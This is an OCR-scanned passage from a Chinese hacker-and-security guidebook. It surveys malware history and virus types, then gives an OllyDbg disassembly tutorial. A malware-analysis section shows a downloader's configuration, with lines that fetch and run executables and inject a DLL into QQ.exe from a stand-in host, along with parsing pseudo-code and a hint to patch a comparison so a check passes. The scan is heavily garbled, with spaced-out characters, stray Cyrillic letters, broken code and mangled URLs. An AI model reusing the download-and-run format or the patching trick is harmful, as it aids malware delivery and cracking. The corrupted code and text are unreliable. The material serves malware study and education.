用 户 缺 乏 网 络 安全 的 防范 意识 ， 以 及 杀毒 软件 对 于 含有 病毒 网 页 的 检查 程度 不 够 而 导致 用 
户 中 招 的 比例 大 大 增加 。 这 也 正 警告 着 维护 网 页 平台 的 安全 人 员 应 及 时 地 填补 网 页 中 的 漏 
洞 ， 计 算 机 用 户 对 于 网 络 安全 的 认识 也 亟待 提高 。 

2009 年 ，“ 网 页 挂 马 ”与 钓鱼 网 站 激增 ， 这 种 成 本 低 、 收 入 颇 高 的 黑色 产业 链 日 渐 
成 型 ， 其 中 钓鱼 网 站 主要 以 各 大 网 络 公司 活动 为 诈骗 诱饵 ， 如 腾讯 QB 充值 、 网 易 点 卡 充 
值 ， 以 及 以 福利 彩票 、 电 视 节 目 中 奖 信息 等 ， 吸 引用 户 填 写 个 人 账户 等 信息 ， 从 而 骗取 用 
户 的 合法 财产 。 随 着 网 络 游戏 产业 的 日 益 兴 旺 ， 基 于 网 络 游戏 制作 的 外 挂 软件 也 纷纷 投入 
市 场 ， 这 些 软件 往往 捆绑 着 木马 病毒 ， 在 用 户 运行 外 挂 软件 非法 盘 利 的 同时 ， 用 户 本 身 的 
利益 也 受到 了 木马 编写 者 的 侵害 ， 可 谓 是 星 螂 捕 蝉 黄 尖 在 后 。 第 一 例 基于 手机 系统 的 木马 
病毒 (间谍 软件 ，Mobile spy) 已 经 渗透 到 世界 各 地 手机 用 户 的 手机 中 ， 相 比 形 形 色色 的 
计算 机 病毒 而 言 ， Mobile spy 无 疑 是 更 加 可 怕 ， 首 先 该 软件 在 当时 几乎 可 以 寄生 、 隐 藏 在 
任意 一 部 手机 中 ， 其 次 就 是 它 强大 的 功能 一 一 拍照 、 录 像 、 录 音 、 定 位 、 短 信 监 控 等 。 由 
于 手机 安全 领域 的 空白 ， 使 得 由 此 间谍 软件 带 来 的 损失 无 法 估计 ， 这 也 警示 着 开拓 手机 安 
全 领域 、 研 制 保护 手机 的 安全 软件 的 任务 刻不容缓 ! 

2010 年 ， 用 户 感 染 计 算 机 病毒 的 比例 为 60%， 相 比 前 一 年 的 70.51% 有 所 下 降 ， 形 成 
下 降 趋 势 的 局 面 ， 一 方面 得 益 于 反 病毒 技术 的 逐步 完善 ， 另 一 方面 得 益 于 对 计算 机 用 户 
防治 病毒 知识 的 普及 。 而 病毒 的 攻击 针对 的 目标 也 转移 至 网 银 、 网 购 等 用 户 ， 实 行 专用 
户 针 对 性 攻击 。 然 而 Web 网 站 安全 形势 依旧 严峻 ， 新 的 0day 不 断 被 挖掘 出 ， 网 站 维护 人 员 
修补 漏洞 不 及 时 ， 使 得 很 多 网 站 依旧 能 被 轻而易举 地 入 侵 、 挂 马 ， 当 用 户 访问 页 面 的 时 
候 ， 病 毒 会 利用 用 户 系 统 内 的 漏洞 完成 入 侵 。 一 种 新 的 攻击 模式 APT 攻 击 借 “ 震 网 病毒 ” 
(Stuxnet) 震惊 全 球 ，APT (Advanced Persistent Threat) ， 即 长 时 间 可 间断 攻击 ， 具 有 强 
烈 的 针对 性 ， 通 常 带 有 浓烈 的 政治 、 利 益 色彩 。“ 震 网 病毒 ”由 美国 及 以 色 列 情报 部 门 
开发 ， 针 对 全 球 各 大 能 源 工 进行 攻击 的 病毒 ， 该 病毒 也 可 以 说 是 信息 化 战场 第 一 例 投入 应 
用 的 病毒 ， 其 中 伊朗 受 其 影响 最 为 严重 。 在 一 次 攻击 中 ,伊朗 的 纳 坦 兹 铀 浓缩 基地 至 少 有 
1/5 的 离心 机 因 感 染 该 病毒 而 被 迫 关闭 。 

果不其然 ， 由 于 Web 安 全 并 没有 得 到 足够 的 重视 ， 在 接 下 来 的 两 年 内 网 购 木 马 出 现 了 
爆发 式 的 增长 。 网 购 木 马 在 后 台 悄 悄 运行 并 且 监 控 计 算 机 用 户 ， 当 计算 机 用 户 通过 网 购 平 
台 交 易 时 ， 木 马 进 行 交易 支持 ， 也 就 是 当前 的 交易 页 面 会 偷偷 被 病毒 跳 转 到 指定 网 址 或 者 
修改 后 台 账 户 指 向 黑客 账户 ， 当 然 先前 的 交易 也 就 神 不 知 鬼 不 觉 地 被 取消 了 ， 其 中 “ 支 
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付 大 资 ” “浮云 ”与 “刺客 ”最 有 代表 性 。2012 年 的 “ 毒 王 ” 依 旧 是 基于 Windows 操 作 系统 
平台 的 “ 鬼 影 ”系列 病毒 ，“ 鬼 影 ” 具 有 的 “小 强 ” 特 性 使 它 位 列 榜首 。“ 鬼 影 ” 有 极 强 
的 生存 能 力 ， 它 能 捆绑 下 载 AV 终 结 者 等 针对 杀毒 软件 的 病毒 程序 ， 并 且 将 主 代码 寄存 在 
MBR (硬盘 主 引导 记录 ) 中 。 这 样 ， 就 算是 重 装 了 系统 ， 病 毒 依然 会 运行 生效 。 同 样 ， 
由 于 安 卓 系 统 开 源 的 特性 ， 安 卓 病毒 有 成 指数 函数 增长 的 趋势 ， 恶 意 扣 费 和 信息 泄露 是 
病毒 主要 的 两 大 功能 ， 并 且 于 2012 年 出 现 寄生 于 微 信 等 平台 的 僵尸 程序 〈 手 机 僵尸 病 
毒 ， 通 过 向 其 他 人 自动 发 送 含 有 病毒 链接 的 短信 、 消 息 进 行 传播 ) ， 手 机 安全 形势 不 容 
乐观 。 

从 2013 到 2015 年 ， 病 毒 的 主要 进攻 方向 已 经 明朗 ， 第 一 是 移动 终端 ， 第 二 则 是 网 络 
支付 服务 。 目 前 在 移动 终端 中 ， 由 于 安 卓 系统 的 开源 性 以 及 大 部 分 APP 没 有 进行 严格 地 审 
核 ， 导 致 病毒 大 肆 发 展 与 传播 ， 并 且 随 着 二 维 码 、 微 信 支 付 等 方式 的 产生 ， 利 用 扫 码 、 支 
付 等 漏洞 的 病毒 正 源源 不 断 地 被 开发 出 来 。 同 样 ，iOS 用 户 也 绝 不 能 掉以轻心 ， 虽 然 APP 
在 App Store 中 需要 经 过 严格 审核 ， 但 是 2014 年 11 月 ， 一 个 名 为 WireLurker 的 病毒 感染 了 约 
35 万 的 中 国 苹果 用 户 。 该 病毒 通过 寄生 在 第 三 方 软件 商店 “麦芽 地 ”中 ， 当 用 户 在 Mac/ 
PC 平台 使 用 “麦芽 地 ”通过 USB 连 接 iOS 设 备 下 载 盗 版 软件 时 ， 病 毒 就 会 顺 着 这 条 数据 
线 ， 从 计算 机 入 侵 到 移动 设备 中 ， 并 且 自 动 下 载 恶 意 软件 ， 无 论 是 否 越狱 。 当 然 ， 广 大 
iOS 用 户 不 必 因 此 害怕 ， 但 却 要 因此 而 警惕 起 来 ， 不 要 贪图 便宜 而 去 下 载 危险 未 知 的 第 三 
方 盗版 软件 ， 也 不 要 去 轻易 越狱 ,病毒 总 是 潜藏 在 未 知 中 。 不 容 置 疑 ， 在 网 络 交 易 平 台所 
带 来 有 巨大 利益 的 这 块 大 蛋糕 的 趋势 下 ， 被 金钱 蒙 珊 了 双眼 的 黑客 也 许 正 酝 酿 着 给 予 互联 
网 交易 一 个 巨大 的 冲击 。 毫 无 疑问 ， 未 来 物 联网 将 成 为 新 时 代 的 主流 科技 ， 而 伴随 着 物 联 
网 的 逐渐 发 展 ， 黑 客 隐患 更 加 不 能 被 忽视 ， 也 许 在 将 来 的 物 联网 时 代 ， 科 幻 游 戏 《 看 门 
狗 》 中 的 病毒 程序 就 会 成 为 现实 。 


913 计算 机 病毒 的 特点 、 分 类 与 目的 


1. 计算 机 病毒 的 特点 


通过 上 面 一 节 计 算 机 病毒 的 发 展 史 ， 我 们 可 以 从 中 总 结 出 计算 机 病毒 的 特性 。 

(OD 传染 性 

计算 机 病毒 就 如 同 生物 病毒 一 般 ， 既 可 以 在 计算 机 系统 内 进行 文件 之 间 的 传染 ， 又 可 
以 在 计算 机 与 计算 机 之 间 传 染 。 传 染 的 媒介 可 以 是 物理 硬件 ， 如 U 盘 、 移 动 硬盘 等 移动 存 
储 设备 ， 也 可 以 是 通过 虚拟 网 络 传输 文件 、 邮 件 等 方式 进行 传染 。 

(2) 破坏 性 

通常 来 说 ， 计 算 机 病毒 几乎 都 带 有 一 定 的 对 计算 机 系统 、 程 序 、 硬 件 的 破坏 能 力 。 破 
坏 能 力主 要 体现 在 算 改 目标 文件 、 破 坏 系统 程序 、 盗 取 账 号 密码 等 方面 。 病 毒 的 威胁 能 力 
并 不 取决 于 病毒 的 破坏 性 ， 而 是 决定 于 病毒 的 隐蔽 性 。 


— 176 一 一 


жой 病毒 不 神秘 人 /7 


(3) 隐蔽 性 

病毒 的 隐蔽 性 是 决定 其 能 否 长 久 存活 并 且 发 挥 作用 的 决定 性 因素 。 病 毒 的 隐蔽 性 体现 
在 : 对 于 计算 机 用 户 而 言 ， 病 毒 能 够 神 不 知 鬼 不 觉 地 在 后 台 悄 悄 运行 ， 并 且 一 般 不 会 做 
出 影响 计算 机 正常 运行 的 行为 ， 能 够 很 好 地 隐藏 而 不 被 计算 机 用 户 发 现 ，@ 对 计算 机 杀毒 
软件 而 言 ， 病 毒 通过 加 壳 免 杀 等 方式 绕 过 杀毒 软件 的 主动 防御 以 及 手动 查 杀 。 一 旦 病毒 做 
到 了 这 两 点 ， 那 么 这 个 病毒 的 隐蔽 性 就 是 极 好 的 ， 同 时 威胁 性 也 是 极 大 的 。 

(4) 潜伏 性 

病毒 的 潜伏 性 则 是 指 当 病毒 寄生 在 宿主 机 内 并 不 会 立刻 发 作 ， 而 是 当 通 过 用 户 或 应 用 
程序 触发 某 种 特定 的 条 件 时 ， 病 毒 才 会 运行 。 

(5) 潜在 性 

计算 机 病毒 会 随 着 科技 的 发 展 而 发 展 ， 伴 随 着 新 兴 应 用 的 产生 而 产生 ， 因 此 计算 机 病 
毒 对 于 任何 一 个 科技 、 应 用 来 说 ， 都 会 有 潜在 的 风险 ， 只 要 有 黑客 想 要 获得 某 种 利益 ， 那 
么 具有 针对 性 的 病毒 便 会 被 研发 出 来 ， 所 以 病毒 具有 潜在 性 。 


2. 计算 机 病毒 的 常见 类 型 


目前 常见 的 计算 机 病毒 主要 有 以 下 几 种 类 型 。 

> 前 缓 带 有 W32/Win32、PE 名 称 ， 称 作 Windows 系 统 病 毒 ， 以 感染 .exe 和 .dl 文件 

> 前 级 中 带 有 Trojan， 也 就 是 常见 的 木马 病毒 ， 通 常会 盗 取 用 户 的 个 人 信息 。 

> 前 组 中 带 有 Hack， 黑 客 病 毒 ， 功 能 以 远程 控制 为 主 。 

前 组 中 带 有 Marco， 宏 病毒 ， 感 染 Office 文 件 。 

> 前 级 中 带 有 Backdoor， 后 门 病毒 ， 通 过 TCP/UDP 协 议 ， 利 用 CMD 命 令 行 入 侵 宿 主 
计算 机 。 

> 前 级 中 带 有 Harm， 破 坏 病毒 ， 对 计算 机 系统 及 文件 进行 破坏 ， 如 格式 化 硬盘 。 

> 前 级 中 带 有 joke， 玩 笑 病毒 ， 主 要 以 恶搞 为 主 。 

> 前 组 中 带 有 Binder， 捆 绑 病 毒 ， 捆 绑 在 其 他 正常 文件 上 ， 比 如 捆绑 QQ.exe, 则 为 
Binder.QQ.exe. 


3. 计算 机 病毒 的 目的 


> 展示 技术 能 力 ， 如 能 猫 烧香 ，“xx 神 器 ”。 
出 于 利益 目的 ， 如 APT 攻 击 ， 木 马 病 毒 。 
> 用 于 军事 ， 如 1999 年 科索沃 战争 ， 南 联盟 使 用 包括 计算 机 病毒 等 手段 实施 网 络 攻 
击 北约 军事 情报 网 络 ， 在 一 定 程度 上 延缓 了 美国 和 北约 其 他 国家 对 南 联盟 的 空 歼 
进程 。 
了 解 了 计算 机 病毒 的 发 展 起 源 与 分 类 ， 那 么 到 底 什么 是 计算 机 病毒 ? 接 下 来 通过 实例 
分 析 ， 来 深入 了 解 病毒 的 原理 。 
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= y — 


EN 蕊 黑客 与 安全 技术 指南 


92 ”常用 工具 及 病毒 分 析 





92.1 OD 进 阶 


在 上 一 章 介绍 逆向 技术 时 ， 讲 述 了 OD 的 基本 使 用 方法 以 及 在 软件 漏洞 分 析 中 的 作 
用 。 接 下 来 的 一 节 中 ， 将 会 使 用 OD 对 “ 敲 竹 杠 ” 病 毒 进行 详细 分 析 ， 并 且 将 在 分 析 的 同 
时 教会 大 家 如 何 去 更 多 地 了 解 OD， 明 白 如 何 去 合 理 、 高 效 地 使 用 与 分 析 。 

首先 来 看 一 小 段 代码 : 


#include "stdafx.h" 

int main(int argc, сһаг* агду[]){ 
printf ("Hello,world!Nn"); 

return 0; 


j 


上 述 代 码 中 只 执行 了 两 条 命令 : printf、retum， 用 于 实现 打印 输出 和 返回 。 
下 面 逐条 解释 反 汇 编 代 码 的 各 个 命令 。 
首先 载 入 OD。 图 9-1 显 示 了 各 个 界面 窗口 。 


LINIEN" 


БЕЛ БЕГЕ E вто ияш EE 


T 
2]. serc . тах 00000000 
- 6n FF push -1 
+ 68 0004000 push 
- 68 8826008 push 00102688 
eax, dword ptr Fs:[0] 
eax 


es fs:[0], esp 反 汇 编 窗口 


со 


7930208 | ntd11 .7С930208 


тғғовою| 
B05ASBFD 
0012ғРСВ 
зїї? 
FFFFFFFF | SEN ñ R E 
7C8398C0| SEA HE TE AE 





9-1 OD 界面 窗口 
在 每 个 窗口 右 击 可 得 到 对 应 窗口 的 菜单 。 
在 一 个 程序 被 载 入 OD 进行 动态 反 汇 编 的 时 候 ， 首 要 的 一 点 就 是 找到 入 口 点 ， 不 同 IDE 
编译 出 的 程序 的 入 口 点 会 有 所 不 同 ， 这 个 就 需要 读者 自己 观察 ， 或 者 百度 搜索 一 下 入 口 点 
特征 。 
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VC 6.0 编 译 出 的 程序 ， 入 口 点 是 三 个 压 栈 指 令 push， 这 个 虽然 在 int main(int argc, char* 
argv[]) 定义 的 时 候 没 有 写 ， 但 是 执行 的 时 候 默 认 还 是 传递 3 个 参数 ， 如 图 9-2 所 示 。 


001010Е3||. 50 push еах 

004010Е4]. FF35 2099%00! push dword ptr [509920] 

004010Еа||. FF35 1C99488! push dword ptr [48991C] 
cal 


9-2 main 函数 入 口 
实际 在 这 三 条 指令 之 前 执行 了 很 多 指令 ， 其 作用 是 初始 化 可 执行 文件 的 空间 ， 并 激 
活 主 线程 ， 这 在 前 面 章 节 有 详细 介绍 。 接 下 来 会 执行 获取 命令 行 的 API 以 便 获取 命令 行 信 
息 ， 这 里 不 考虑 ， 仅 作 提示 ， 有 兴趣 的 读者 可 以 自己 查阅 相关 资料 。 
这 里 说 一 下 Call 指 令 ， 熟 悉 VB 的 读者 可 能 会 知道 Call 指 令 ， 比 如 下 面 一 个 简短 的 Test() 
子 函 数 。 


Private Sub Form Load() 
Call Test 

End Sub 

Sub Test() 

MsgBox "我 是 测试 " 

End Sub 


程序 执行 后 进入 Load 函 数 执行 Call Test 指 令 ， 其 作用 就 是 激活 Test 子 函数 。 在 汇编 语 
言 中 有 详细 解释 ，Call 执行 后 程序 的 流程 就 进入 了 Test 子 函数 里 ， 上 述 汇 编 代码 则 是 进入 
了 00401000 这 个 地 址 内 ， 因 为 Call 支 持 直 接 进 入 Call 地 址 、Call 寄 存 器 。 

如 果 想 看 Call 所 指示 的 子 函数 的 话 ， 可 按 OD 的 快捷 键 F7。 这 里 直接 按 下 F7 键 跟 进 ， 
看 到 如 图 9-3 所 示 结 果 。 


图 9-3 FAA 
这 里 有 个 类 似 中 括号 的 符号 ， 括 住 的 内 容 就 是 一 段子 函数 ， 其 sub test() 
结构 如 图 9-4 所 示 。 
说 明 : 参数 是 保存 在 栈 中 的 ， 而 栈 是 通过 ss: sp 来 定位 的 。 每 
次 用 Call 调 用 子 函 数 的 时 候 ， 如 果 有 参数 必然 会 调用 push， 因 为 
push 是 压 栈 操作 ， 意 思 是 将 数据 压 入 栈 内 。 


end sub 
894 子 函数 结构 


00401000 /$ 68 30704000 push 00407030 ; 

ASCII "Hello World!", 

LF 

// 这 一 条 指令 的 意思 是 将 00407030 地 址 内 的 ASCII 字 符 "Hello World" 压 入 堆栈 
00401005 |. E8 06000000 call 00401010 

// 跳 转 到 00401010 地 址 去 执行 代码 ,这 里 的 00401010 就 相当 于 sub тезі () 
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0040100A |. 83C4 04 add esp, 4 
// 平 衡 栈 空间 

0040100D |. 33C0 xor eax, eax 
// 清 空 寄存 器 

0040100F \. C3 retn 

// 返 回 


至 此 可 以 大 概 地 梳理 出 代码 的 反 汇编 代码 执行 流程 。 


#include "stdafx.h" 

int main(int argc, char* argv[]) 
printf ("Hello,world!\n"); 

return 0; 


} 


首先 执行 主 函 数 main。 因 为 main 有 3 个 参数 ， 所 以 要 把 这 3 个 参数 事先 压 入 到 栈 空 间 ， 
以 便 调用 main 的 时 候 可 以 在 main 函 数 内 部 得 到 参数 。 

压 入 完成 后 执行 Call 函 数 ， 跳 转 到 main 主 程序 。main 程 序 首先 调用 printf 函 数 ， 因 为 
printf 函 数 有 一 个 参数 ， 所 以 在 调用 函数 之 前 先 把 参数 压 入 到 栈 中 再 调用 ， 所 以 就 有 如 下 
的 反 汇 编 代码 。 

00401000 /$ 68 30704000 push 00407030 ; ASCII “Hello World!" ,LF 

00401005 |. E8 06000000 call 00401010 


调用 完成 之 后 需要 平衡 栈 空间 ， 由 于 这 里 的 系统 是 32 位 的 ， 所 以 参数 就 是 4。 


0040100A |. 83C4 04 add esp, 4 


清空 eax 寄 存 器 后 返回 ， 执 行 retum 0。 这 就 是 上 述 代 码 的 执行 流程 。 
再 看 一 段 代码 。 


#include "stdafx.h" 
int main(int argc, char* argv[]) 


t 


int a; 

scanf ("$d",&a) ; 
а=; 

if (a==1) 

{printf ("成 功 \n");} 
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else 
(printf ("失败 \n") ;} 
return 0; 


} 


从 代码 逻辑 看 ， 可 以 知道 输入 1 会 提示 成 功 ， 其 他 值 均 为 失败 。 这 里 是 最 基本 的 判 
其 中 只 是 将 a-- 变 形 了 一 下 。 
下 面 是 上 面 代码 的 反 汇编 的 main 代 码 。 


00401000 /$ 51 push ecx ; OllyDbgT.004080C8 

// 保 护 现场 

00401001 |. 8D4424 00 lea eax, dword ptr [esp] 
// 获 取 int а 变量 的 地 址 保存 进 eax 寄 存 器 内 

00401005 |. 50 push eax 

// 将 a 的 地 址 压 栈 

00401006 |. 68 40804000 push 00408040 ; RSCII "%d" 
// 将 字符 压 栈 

0040100B |. E8 71000000 call 00401081 

// 调 用 scanf 函 数 

00401010 |. 8B4424 08 mov eax, dword ptr [еѕр+8] 
// 将 输入 的 数字 保存 进 eax 寄 存 器 内 , 这 里 的 esp+8 实 际 因 为 a 地 址 是 第 二 个 参数 
00401014 |. 83C4 08 add esp, 8 

// 平 衡 栈 空 间 

00401017 |. 48 dec eax 

// 这 里 是 eax 内 的 数据 进行 减 1 操作 

00401018 |. 83F8 01 cmp eax, 1 

// 将 eax 寄 存 器 的 内 容 与 1 进行 比较 

0040101B |. 894424 00 mov dword ptr [esp], eax 
// 将 eax 寄 存 器 里 的 内 容 保存 进 a 变 量 内 

0040101F |. 75 11 jnz short 00401032 

// 如 果 不 为 2 则 跳 转 

00401021 |. 68 38804000 push 00408038 

ПЕЛ. “成功 ”字符 

00401026 |. E8 25000000 call 00401050 


// 执 行 打印 输出 函数 

0040102B |. 83C4 04 add esp, 4 
// 平 衡 栈 

0040102E |. 33C0 xor eax, eax 
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// 清 零 

00401030 |. 59 pop ecx 

// 弹 出 ecx 

00401031 |. C3 retn 

// 返 回 

00401032 |> 68 30804000 push 00408030 
// 压 入 “失败 ”字符 

00401037 |. E8 14000000 call 00401050 
// 执 行 打印 输出 函数 

0040103C |. 83C4 04 add esp, 4 

// 平 衡 栈 

0040103F |. 33C0 xor eax, eax 

// 清 零 

00401041 |. 59 pop ecx 

// 弹 出 ecx 

00401042 \. C3 retn 

// 返 回 


提示 : 可 以 看 到 00401018 |. 83F8 01 cmp eax，1 是 个 关键 ， 把 1 修改 为 2 试 试 ? 

下 面 来 解释 软件 调试 分 析 中 的 部 分 术语 。 

栈 是 一 组 连续 的 内 存 地 址 ， 其 大 小 为 <=2^ 操 作 系统 位 数 为 ?2，ss: sp 为 两 个 与 栈 有 关 
的 寄存 器 。 

> s 为 段 寄存 器 。 

> sp 为 偏 移 寄存 器 。 

ss: sp 在 任意 时 刻 都 指向 栈 项 ， 即 栈 空 间 最 大 值 加 上 一 个 字 节 。 

当 栈 为 空 的 时 候 ， 栈 里 没有 元 素 ， 也 就 没有 所谓 的 栈 顶 元 素 ， 只 能 指向 下 一 
个 内 存单 元 。 例 如 : 将 10000H 一 1000FH 作 为 栈 ， 当 其 为 空 的 时 候 ， 其 中 ss: sp 为 
10000H—10010H; 当 要 压 入 元 素 时 ax=2266H， 则 执行 push ax 时 ，ss: sp 指向 的 栈 顶 为 
10000H~10010H-2〈( 这 里 的 2 可 能 是 位 数 ) ， 也 就 是 10000H~1000EH， 然 后 写 入 数据 ， 
高 地 址 数据 存 入 高 地 址 ， 低 地 址 数据 存 入 低地 址 。 

ah=22 存 入 1000FH，al=66 存 入 1000EH， 压 入 栈 的 时 候 sp+2， 弹 出 栈 的 时 候 sp-2。 

拿 到 样本 这 里 的 样本 默认 为 可 执行 文件 ) 后 ， 要 用 杀 病 毒 软件 进行 查 杀 ， 然 后 得 到 
样本 的 杀毒 软件 定义 名 称 ， 接 着 用 搜索 引擎 进行 搜索 查询 ， 看 看 有 没有 有 用 的 信息 。 接 
着 还 要 用 PEiD 查 看 这 个 样本 的 输入 表 ， 看 都 有 什么 函数 ， 然 后 再 看 这 个 程序 是 否 是 窗口 
程序 。 

如 果 是 : 确认 这 个 窗口 是 否 是 MFC 窗 口 ， 如 果 是 就 检查 MFC 窗 口 启动 前 有 没有 多 余 
的 操作 。 分 析 的 时 候 结合 IDA 能 够 更 快 地 得 到 启动 函数 的 内 存 地 址 ， 然 后 可 以 对 比 MFC 启 
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动 函 数 的 源 代 码 。 

如 果 不 是 : 也 需要 找到 启动 函数 。 这 个 大 家 可 以 自行 编写 一 些 窗口 程序 进行 分 析 。 

首先 打开 一 款 HIPS 软 件 〈 能 够 记录 较 多 行为 的 软件 ) ， 然 后 直接 在 OlyDbg 运 行 〈 已 
经 对 样本 输入 表 进 行 下 断 ) 。 这 一 遍 只 是 粗略 地 结合 HIPS 日 志 ， 大 体 地 了 解 这 个 样本 的 
功能 ;然后 才 是 根据 这 些 零 散 的 功能 做 具体 分 析 。 

例如 下 载 者 样本 ， 在 运行 后 由 于 是 下 载 者 ， 必 要 的 工作 是 验证 是 否 联 网 ， (有些 编 
写 者 不 验证 网 络 直 接 下 载 ， 这 对 分 析 没 有 太 大 影响 ) ， 然 后 寻找 服务 器 ， 得 到 下 载 地 址 路 
径 。 如 果 是 批量 下 载 可 能 还 会 遇 到 字符 的 处 理 问 题 ， 比 如 以 下 格式 的 下 载 地 址 。 


http: NLILLINLtxt 

内 容 如 下 : 

http: \1.1.1.1\1.exe，NULL， 运 行 

http: \1.1.1.12.DLL， 注 入 到 QQ.exe， 运 行 

http: \\1.1.1.1\3.exe, NULL, i&íT 

http: \\1.1.1.1W.exe, NULL, ЗТ 

当 从 http: \1.1.1.1\1.txt 获取 样本 后 ， 会 获取 到 上 述 格式 的 字符 串 。 


这 时 就 要 进行 字符 截取 ， 首 先是 回 车 符 ， 其 次 是 逗号 ， 然 后 定义 一 个 数组 。 这 里 只 给 
出 伪 代 码 : 

字符 串 = 获取 网 络 地 址 字符 C “http: LL LIM.xt" 2 ; 

数组 = 分 割 字符 〈 字 符 串 ， 回 车 符 ) : 

数组 1= 分 割 字符 〈 数 组 ， 逗 号 ) ; 

则 


数组 1[0] // 为 地 址 
数组 1[1] // 为 指令 
数组 1[2] // 是 直接 运行 还 是 等 待 运行 


然后 再 根据 指令 下 载 。 

上 述 是 下 载 者 在 下 载 前 对 字符 的 处 理 ， 接 下 来 介绍 OllyDbg 的 下 断 方式 。 

首先 说 明 一 下 中 文 帮助 文档 。OllyDbg 支 持 数 种 不 同类 型 的 断 点 。 

(D 一 般 断 点 (Ordinary breakpoint) 。 将 想 中 断 的 命令 的 第 一 个 字 节 ， 用 一 个 特殊 
命令 INT3〔 调 试 器 陷阱 ) 来 替代 。 在 反 汇 编 窗口 中 ， 选 中 要 设 断 点 的 指令 行 并 按 F2 键 ， 
就 可 以 设 定 一 个 此 类 型 的 断 点 ， 也 可 以 在 快捷 菜单 中 设置 。 再 次 按 下 F2 键 时 ， 断 点 将 被 
删除 。 注 意 ， 程 序 将 在 设置 断 点 指令 被 执行 之 前 中 断 。 

INT3 断 点 的 设置 数量 是 没有 限制 的 ， 当 关闭 被 调试 程序 或 者 调试 器 的 时 候 ，OllyDbg 
将 自动 把 这 些 断 点 保存 到 硬盘 中 。 永 远 不 要 试图 在 数据 段 或 者 指令 的 中 间 设 置 这 种 断 点 ， 
如 果 在 代码 段 以 外 设置 断 点 ，OllyDbg 将 会 发 出 警告 。 在 安全 选项 (Security options) "HX 
闭 这 个 提示 ， 调 试 器 在 某 些 情况 下 会 插入 自 带 的 临时 INT3 断 点 。 

(2) 条 件 断 点 〈Conditional breakpoint) ， 其 快捷 键 Shift+F2。 条 件 断 点 是 一 个 带 
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有 条 件 表 达 式 的 普通 INT3 断 点 。 当 调试 器 遇 到 这 类 断 点 时 会 计算 表达 式 的 值 ， 如 果 结 
果 非 零 或 者 表达 式 无 效 ， 将 暂停 被 调试 程序 。 当 然 ， 由 条 件 为 假 的 断 点 引起 的 开销 是 非 
常 高 的 〈 主 要 归 因 于 操作 系统 的 反应 时 间 ) 。 在 Windows NT、 奔 腾 开 /450 处 理 器 环境 
下 ，OllyDbg 每 秒 最 多 处 理 2500 个 条 件 为 假 的 断 点 。 条 件 断 点 的 一 个 典型 使 用 情况 就 是 在 
Windows} SE (kkn WM_PAINT) 设置 断 点 。 为 此 ， 可 以 将 伪 变 量 MSG 同 适当 的 参数 
说 明 联 合 使 用 ， 如 果 窗 口 被 激活 ， 可 参考 后 面 的 消息 断 点 描述 。 

(з) 条 件 记录 断 点 (Conditional logging breakpoint) ， 其 快捷 键 为 ShifttF4。 条 件 记 
录 断 点 是 一 种 条 件 断 点 ， 每 当 遇 到 此 类 断 点 或 者 满足 条 件 时 ， 它 将 记录 已 知 函 数 表达 式 
或 参数 的 值 。 例 如 ， 可 以 在 一 些 窗口 过 程 函数 上 ， 设 置 记录 断 点 并 列 出 对 该 函数 的 所 有 
调用 。 要 么 只 对 接收 到 的 WM_COMMAND 消 息 标识 符 设 断 点 ， 要 么 对 创建 文件 的 函数 
(CreateFile) 设 断 点 ， 并 且 记 录 以 只 读 方式 打开 的 文件 名 等 ， 记 录 断 点 和 条 件 断 点 的 速 
度 相 当 ， 从 记录 窗口 中 浏览 上 百 条 消息 要 比 按 上 百 次 F9 键 轻松 得 多 ， 读 者 可 以 为 表达 式 选 
择 一 个 预先 定义 好 的 解释 说 明 。 

设置 通过 次 数 。 每 次 符合 暂停 条 件 时 ， 计 数 器 就 会 减 1。 如 果 通 过 次 数 在 减 1 前 ， 不 等 
于 0，OllyDbg 就 会 继续 执行 。 如 果 一 个 循环 执行 100 次 〈 十 进 制 ) ， 在 循环 体内 设置 一 个 
断 点 并 设置 通过 次 数 为 99〈 十 进 制 ) ，OllyDbg 将 会 在 最 后 一 次 执行 循环 体 时 暂停 。 

条 件 记录 断 点 允许 传递 一 个 或 多 个 命令 给 插件 (plugins) 。 例 如 ， 读 者 需要 使 用 命令 
行 插件 改变 一 个 寄存 器 的 内 容 ， 然 后 继续 执行 程序 。 

(4) 消息 断 点 (Message breakpoint) 。 消 息 断 点 和 条 件 记录 断 点 基本 相同 ，OllyDbg 
会 自动 产生 一 个 条 件 ， 这 个 条 件 允 许 在 窗口 过 程 的 入 口 处 设置 某 些 消息 〈 比 如 WM_ 
PSINT) 断 点 ， 可 以 在 Windows 窗 口中 设置 它 。 

(5) 跟踪 断 点 〈Trace breakpoint) 。 跟 踪 断 点 是 在 每 个 选中 命令 上 设置 的 一 种 特殊 
的 INT3 断 点 。 如 果 设 置 了 Hit 跟 踪 (hit trace) ， 断 点 会 在 命令 执行 后 移 除 并 在 该 地 址 处 做 
一 个 标记 ; 如 果 使 用 的 是 Run 跟 踪 (rmun trace) ，OllyDbg 会 添加 跟踪 数据 记录 并 且 仍 然 保 
持 断 点 的 激活 状态 。 

(6) 内 存 断 点 (Memory breakpoint) 。OllyDbg 每 一 时 刻 只 允许 有 一 个 内 存 断 点 。 
在 反 汇 编 窗口 、CPU 窗 口 、 数 据 窗口 中 选择 一 部 分 内 存 ， 然 后 使 用 快捷 菜单 可 以 设置 内 存 
断 点 ， 此 时 如 果 有 以 前 的 内 存 断 点 ， 将 被 自动 删除 。 要 么 在 内 存 访问 ( 读 、 写 、 执 行 》 
时 中 断 ， 要 么 在 内 存 写 入 时 中 断 。 设 置 此 类 断 点 时 ，OllyDbg 将 会 改变 所 选 部 分 的 内 存 块 
属性 。 在 与 80 X86 兼容 的 处 理 器 上 ， 将 会 有 4096Byte 的 内 存 被 分 配 并 保护 起 来 ， 即 使 仅仅 
选择 了 1 个 字 节 ，OllyDbg 也 会 将 整个 内 存 块 都 保护 起 来 ， 这 将 会 引起 大 量 的 错误 警告 ， 
请 小 心 使 用 此 类 断 点 。 某 些 系统 函数 〈 尤 其 是 在 Windows 95/98 下 ) 在 访问 受 保护 的 内 存 
时 ， 不 但 不 会 产生 调试 事件 反而 会 造成 被 调试 程序 的 崩溃 。 

(7) 硬件 断 点 (Hardware breakpoint) 〈 仅 在 Windows ME/NT/2000 下 可 用 ) 。 在 
80X86 兼 容 的 处 理 器 上 ， 人 允许 设置 4 个 硬件 断 点 ， 硬 件 断 点 和 内 存 断 点 不 同 ， 它 并 不 会 降 
低 执 行 速度 ， 但 是 最 多 只 能 覆盖 4 个 字 节 。 在 单 步 执行 或 者 跟踪 代码 时 ，OllyDbg 能 够 使 用 
硬件 断 点 代替 INT3 断 点 。 
